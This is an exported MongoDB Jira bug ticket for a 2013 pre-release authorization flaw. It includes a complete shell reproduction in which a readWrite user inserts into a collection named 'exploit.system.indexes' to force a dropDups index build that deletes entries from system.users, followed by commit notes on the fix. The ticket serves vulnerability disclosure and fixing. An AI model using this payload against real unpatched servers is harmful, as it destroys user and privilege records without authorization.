[SERVER-8802] readWrite users can delete privilege documents via ensureIndex Created: 01/Mar/13  Updated: 11/Jul/16  Resolved: 01/Mar/13

Status: Closed
Project: Core Server
Component/s: Security
Affects Version/s: 2.4.0-rc1
Fix Version/s: 2.4.0-rc2

Type: Bug Priority: Major - P3
Reporter: J Rassi Assignee: Spencer Brody (Inactive)
Resolution: Done Votes: 0
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified

Issue Links:
Depends
depends on SERVER-8814 Inserts into any namespace ending in ... Closed
Related
Participants:

 Description   

There is (arguably) an error in the logic that decides whether to associate ActionType::ensureIndex with an insert request. A readWrite user can exploit this error to initiate a dropDups index build on system.users by writing to a collection named e.g. exploit.system.indexes.

Reproduce with:

conn = MongoRunner.runMongod({auth:''})
 
adminDb = conn.getDB("admin")
testDb = conn.getDB("test")
adminDb.addUser({user:'admin', pwd:'x', roles:['userAdminAnyDatabase']})
adminDb.auth('admin','x')
adminDb.addUser({user:'mallory', pwd:'x', roles:[], otherDBRoles:{test:['readWrite']}})
testDb.addUser({user:'user1', pwd:'x', roles:['read']})
testDb.addUser({user:'user2', pwd:'x', roles:['read']})
assert.eq(2, testDb.system.users.count())
adminDb.logout()
 
adminDb.auth('mallory','x')
testDb.exploit.system.indexes.insert({ns: "test.system.users", key: { haxx: 1.0 }, name: "haxx_1", unique: true, dropDups: true})
adminDb.logout()
 
adminDb.auth('admin','x')
// The following fails with "assert: [2] != [1] are not equal : undefined"
assert.eq(2, testDb.system.users.count()) 
 
MongoRunner.stopMongod(conn)



 Comments   
Comment by auto [ 02/Mar/13 ]

Author:

{u'date': u'2013-03-02T13:51:46Z', u'name': u'Tad Marshall', u'email': u'tad@10gen.com'}

Message: SERVER-8814 SERVER-8802 Do not change 'db' in test

Do not change the 'db' variable in indexOtherNamespace.js. When run as part
of sharding_passthrough.js, this breaks downstream tests (rename.js was one).
Branch: master
https://github.com/mongodb/mongo/commit/c8fea053358994f98cd8e4112ae90e90ce207d9a

Comment by auto [ 01/Mar/13 ]

Author:

{u'date': u'2013-03-01T19:01:34Z', u'name': u'Spencer T Brody', u'email': u'spencer@10gen.com'}

Message: SERVER-8802 SERVER-8814 Don't build indexes from inserts into collection names ending in ".system.indexes"
Branch: master
https://github.com/mongodb/mongo/commit/28c49b3882ccca72971270fcebc438c593aa6ede

Generated at Thu Feb 08 03:18:29 UTC 2024 using Jira 9.7.1#970001-sha1:2222b88b221c4928ef0de3161136cc90c8356a66.